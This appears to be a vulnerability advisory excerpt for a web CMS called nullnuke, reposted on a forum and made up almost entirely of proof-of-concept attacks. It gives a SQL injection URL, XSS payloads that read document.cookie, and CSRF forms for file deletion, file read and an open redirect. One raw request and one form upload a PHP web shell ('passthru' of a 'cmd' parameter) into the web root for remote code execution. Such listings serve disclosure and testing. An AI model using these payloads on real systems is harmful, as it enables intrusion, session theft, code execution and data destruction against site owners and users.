کد:
-------------------------------------[*] SQL Injection, CSRF (msgid param) ------------------------------------- http://localhost/nullnuke/msgbox.php?nxt=readmsg&view=1&msgid=7%27 ----------------------------------------[*] Stored XSS, CSRF (faqcattitle param) ---------------------------------------- <html><body> <form action="http://localhost/nullnuke22/admin.php?fct=faq&nxt=FaqCatAdd" method="POST"> <input type="hidden" name="faqcattitle" value='"><script>alert(document.cookie);</script>' /> <input type="submit" value="Execute!" /> </form> </body></html> -----------------------------------------------------------------------------------------[*] Arbitrary File Upload at arbitrary location, CSRF, RCE (fupload[1], uploadpath param) ----------------------------------------------------------------------------------------- POST /nullnuke22/admin.php?fct=file_types&nxt=fileSystem&upload=here HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------117202350024276 Content-Length: 786 -----------------------------117202350024276 Content-Disposition: form-data; name="fupload[1]"; filename="shell.php" Content-Type: application/octet-stream <?php passthru($_GET['cmd']); ?> -----------------------------117202350024276 Content-Disposition: form-data; name="uploadpath" C:/xampp/htdocs/nullnuke22/ -----------------------------117202350024276 Content-Disposition: form-data; name="_numfeilds" 1 -----------------------------117202350024276 Content-Disposition: form-data; name="uploadform" Upload -----------------------------117202350024276 Content-Disposition: form-data; name="unpack_archive" 0 -----------------------------117202350024276 Content-Disposition: form-data; name="addfeild" 1 -----------------------------117202350024276-- -- <html><body> <form action="http://localhost/nullnuke22/admin.php?fct=file_types&nxt=fileSystem&upload=here" method="POST" enctype="multipart/form-data"> <input type="hidden" name="fupload[1]" value="<?php passthru($_GET['cmd']); ?>" /> <input type="hidden" name="uploadpath" value="C:/xampp/htdocs/nullnuke22/" /> <input type="hidden" name="_numfeilds" value="1" /> <input type="hidden" name="uploadform" value="Upload" /> <input type="hidden" name="unpack_archive" value="0" /> <input type="hidden" name="addfeild" value="1" /> <input type="submit" value="Execute!" /> </form> </body></html> ---------------------------------------------------[*] Arbitrary File Deletion, CSRF (dfarray[] param) --------------------------------------------------- <html><body> <form action="http://localhost/nullnuke2/admin.php?fct=file_types&nxt=fileSystem" method="POST"> <input type="hidden" name="delfile" value="Delete" /> <input type="hidden" name="dfarray[]" value="C:/secret_secrets.txt" /> <input type="submit" value="Execute!" /> </form> </body></html> -------------------------------------------------------------------------------------------[*] Arbitrary File Read using absolute path, CSRF (file param, value needs to be in base64) ------------------------------------------------------------------------------------------- http://localhost/nullnuke22/admin.php?fct=file_types&nxt=getfile&path=&file=QzpcdGVzdC50eHQ= - QzpcdGVzdC50eHQ= (C:\test.txt) -------------------------------------------[*] Open Redirect, CSRF (redirectlgn param) ------------------------------------------- <html><body> <form action="http://localhost/nullnuke22/login.php?nxt=chklogin" method="POST"> <input type="hidden" name="uname" value="admin" /> <input type="hidden" name="pass" value="admin" /> <input type="hidden" name="remlogin" value="0" /> <input type="hidden" name="redirectlgn" value="http://www.zeroscience.mk" /> <input type="hidden" name="stripit_form" value="uname|pass" /> <input type="hidden" name="mpn_sectype" value="1" /> <input type="submit" value="Execute!" /> </form> </body></html> -----------------------------------------------------------------[*] Reflected XSS, CSRF (upload param, Referer HTTP Header field) ----------------------------------------------------------------- http://localhost/nullnuke22/admin.php?fct=file_types&nxt=fileSystem&upload=here1f454"><script>alert(1);</script>6747f198ae5 -- GET /nullnuke22/login.php?nxt=chklogin&uname=admin&pass=admin&remlogin=0&redirectlgn=http%3A%2F%2Flocalhost%2Fnullnuke22%2Fadmin.php%3Ffct%3Dfile_types%26nxt%3DfileSystem%26upload%3Dhere&stripit_form=uname%7Cpass&mpn_sectype=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://www.google.com/search?hl=en&q=b55ec"><script>alert(document.cookie);</script>bb8d1b11bd9304d5f Connection: keep-alive